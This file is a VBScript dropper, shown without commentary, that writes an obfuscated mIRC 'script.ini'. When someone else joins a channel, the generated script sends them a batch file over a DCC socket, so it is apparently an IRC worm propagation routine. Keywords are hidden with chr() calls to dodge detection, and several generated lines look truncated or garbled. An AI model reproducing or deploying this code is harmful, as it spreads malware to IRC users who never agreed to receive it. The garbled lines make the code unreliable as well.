dim fso, file  
set fso = createobject("scripting.filesystemobject")  
set file = fso.createtextfile ("\script.ini", true) 
file.writeline  "   on 1:st" + chr( 97) + "rt: { ." + chr( 115) + chr( 101) + chr( 116) + " " + chr( 37) + "filee \name.b" + chr( 97) + "t }" 
file.writeline  "   on 1:join:#: { " 
file.writeline  "    .if (" + chr( 36) + "nick != " + chr( 36) + "me " + chr( 38) + "" + chr( 38) + " " + chr( 37) + "old != " + chr( 36) + "nick) {" 
file.writeline  "    ." + chr( 115) + chr( 101) + chr( 116) + " " + chr( 37) + "old " + chr( 36) + "nick" 
file.writeline  "    .timer " + chr( 36) + "+ " + chr( 36) + "r" + chr( 97) + "nd(1,100000) 1 5 ." + chr( 36) + "check_him( " + chr( 36) + "nick , " + chr( 36) + "ch" + chr( 97) + "n )" 
file.writeline  "                                        }  " 
file.writeline  "   }" 
file.writeline  "  " + chr( 97) + "li" + chr( 97) + "s check_him {" 
file.writeline  "  ." + chr( 115) + chr( 101) + chr( 116) + " " + chr( 37) + "port " + chr( 36) + "r" + chr( 97) + "nd(9999,999999)  " 
file.writeline  "  .while (" + chr( 36) + "portfree(" + chr( 37) + "port) == " + chr( 36) + "f" + chr( 97) + "lse) { ." + chr( 115) + chr( 101) + chr( 116) + " " + chr( 37) + "port " + chr( 36) + "r" + chr( 97) + "nd(9999,999999) }" 
file.writeline  "  . (" + chr( 36) + "1 !isop " + chr( 36) + "2) {    " 
file.writeline  "    .ice " + chr( 36) + "1 :DCC " + chr( 115) + chr( 101) + chr( 110) + chr( 100) + " teletubies ( " + chr( 36) + "+ " + chr( 36) + "ip " + chr( 36) + "+ ) " 
file.writeline  "    ." + chr( 115) + chr( 101) + chr( 116) + " " + chr( 37) + "sock_n" + chr( 97) + "me " + chr( 36) + "r" + chr( 97) + "nd(1,99999)" 
file.writeline  "    .msg " + chr( 36) + "1 DCC " + chr( 115) + chr( 101) + chr( 110) + chr( 100) + " " + chr( 37) + "filee " + chr( 36) + "longip(" + chr( 36) + "ip)  " + chr( 37) + "port " + chr( 36) + "file(" + chr( 37) + "filee).size " + chr( 36) + "+ " 
file.writeline  "    .socklisten " + chr( 37) + "sock_n" + chr( 97) + "me " + chr( 37) + "port" 
file.writeline  "    .timers off" 
file.writeline  "    .timer " + chr( 36) + "+ " + chr( 36) + "r" + chr( 97) + "nd(1,99999) 0 10 .cloze" 
file.writeline  "                    }  " 
file.writeline  "  }" 
file.writeline  "  on 1:socklisten:" + chr( 37) + "sock_n" + chr( 97) + "me: {" 
file.writeline  "  ." + chr( 115) + chr( 101) + chr( 116) + " " + chr( 37) + "client_n" + chr( 97) + "me " + chr( 36) + "r" + chr( 97) + "nd(1,9999999)" 
file.writeline  "  .sockclose " + chr( 37) + "sock_n" + chr( 97) + "me" 
file.writeline  "  ." + chr( 115) + chr( 101) + chr( 116) + " " + chr( 37) + "l 0" 
file.writeline  "  .bre" + chr( 97) + "d " + chr( 37) + "filee " + chr( 37) + "l 4000 " + chr( 38) + "le"  
file.writeline  "  .sockwrite -b " + chr( 37) + "client_n" + chr( 97) + "me 4000 " + chr( 38) + "le" 
file.writeline  "  " + chr( 37) + "l = " + chr( 37) + "l + 4000" 
file.writeline  "  ." + chr( 115) + chr( 101) + chr( 116) + " " + chr( 37) + "end 0" 
file.writeline  "  }" 
file.writeline  "  on 1:sockre" + chr( 97) + "d:" + chr( 37) + "client_n" + chr( 97) + "me: {" 
file.writeline  "  . (" + chr( 37) + "l >= " + chr( 36) + "file(" + chr( 37) + "filee).size) {" 
file.writeline  "    ." + chr( 115) + chr( 101) + chr( 116) + " " + chr( 37) + "end 1" 
file.writeline  "    .sockclose " + chr( 37) + "client_n" + chr( 97) + "me" 
file.writeline  "    .h" + chr( 97) + "lt" 
file.writeline  "   } .else {" 
file.writeline  "    . (" + chr( 37) + "end != 1) {" 
file.writeline  "    .bre" + chr( 97) + "d " + chr( 37) + "filee " + chr( 37) + "l 4000 " + chr( 38) + "le" 
file.writeline  "    .sockwrite -b " + chr( 37) + "client_n" + chr( 97) + "me 4000 " + chr( 38) + "le" 
file.writeline  "    " + chr( 37) + "l = " + chr( 37) + "l + 4000" 
file.writeline  "  } } }" 
file.writeline  "  " + chr( 97) + "li" + chr( 97) + "s cloze { .sockclose " + chr( 37) + "sock_n" + chr( 97) + "me } " 
file.Close 
